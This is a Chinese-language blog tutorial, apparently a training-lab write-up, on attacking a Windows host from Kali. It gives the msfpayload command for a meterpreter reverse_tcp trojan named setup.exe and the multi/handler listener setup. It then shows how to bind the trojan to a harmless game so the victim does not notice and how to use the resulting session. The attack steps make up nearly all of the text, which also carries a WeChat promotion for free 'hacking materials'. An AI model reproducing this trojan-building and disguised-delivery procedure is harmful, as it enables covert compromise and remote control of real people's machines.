這個實驗主要讓我們學習漏洞掃描技識訓本原理,了解其在網路攻防中的作用,掌握使用Kali中的Metasploit對目標主機滲透,并根據報告做出相應的防護措施,
本次實戰環境:Kali滲透Windows服務器
實戰步驟一
本實驗通過利用kali進行漏洞掃描,使用Metasploit對目標主機進行滲透測驗,并根據報告做出相應的防護措施,共分為3個實驗步驟,詳情如下;
1、 實戰步驟一:生成setup.exe后門程式,即木馬程式,
(1) 打開kali終端,輸入ifconfig, 得到本機ip為192.168.189.130,
如下圖:
(2)輸入以下命令,使用msfpayload生成名為setup的后門程式:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下圖:
(3) 進入setup.exe所在目錄,修改屬性:選擇“允許以程式執行檔案”,
如下圖所示:
(4) 終端中輸入首先msfconsole;然后輸入use exploit/multi/handler來加載 exploit/multi/handler 模塊;輸入set LHOST 192.168.189.130來設定本地主機;然后輸入exploit -z -j開始監聽,如下圖所示:
實戰步驟二
將上面生成的木馬程式與某個軟體進行捆綁,
【----幫助網安學習,以下所有學習資料免費領!加vx:yj009991,備注 “博客園” 獲取!】
① 網安學習成長路徑思維導圖
② 60+網安經典常用工具包
③ 100+SRC漏洞分析報告
④ 150+網安攻防實戰技術電子書
⑤ 最權威CISSP 認證考試指南+題庫
⑥ 超1800頁CTF實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP客戶端安全檢測指南(安卓+IOS)
(1)可以在windows系統下使用exe捆綁軟體將setup.exe和一個其他的某個安全軟體合并為一個軟體,這樣在運行軟體時兩個軟體同時運行,不會引起注意,在tools里面進入名為exekunbang的檔案,先打開ExeBinder.exe捆綁軟體,選擇第一個要合并的軟體,默認選擇本軟體中自帶的小游戲程式:
點擊下一步,選擇第二個要捆綁的軟體,即之前生成的木馬程式setup.exe:
點擊下一步,選擇一個檔案要保存的路徑:
繼續點擊下一步,開始捆綁軟體:
(2) 將捆綁后的軟體發送給目標主機,
實戰步驟三
檢測目標主機,對目標主機進行滲透測驗,
(2) 目標主機執行程式后,在kali終端中的檢測程式會及時檢測到,在檢測到目標主機運行程式后,后門程式會反向連接到msf,之后msf發起第二次攻擊(開始滲透),然后客戶端(后門程式)連接到服務端(msf),輸入sessionss:
可以看到目標主機的ip為192.168.189.129,
(2)再繼續輸入sessions -i 1,之后可以對目標主機進行一系列的操作,如輸入sysinfo可知道目標主機的系統資訊;輸入 getuid查看對方正在運行的用戶,
要養成多思考多總結的習慣,對實驗結果多去分析,這樣回識訓更多,比如如何利用kali進行漏洞掃描;如何使用Metasploit對目標主機進行滲透測驗;這些都是這次實戰后可以去思考的,
更多網安技能的在線實操練習,請點擊這里>>
合天智匯:合天網路靶場、網安實戰虛擬環境
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/553836.html
標籤:其他
下一篇:返回列表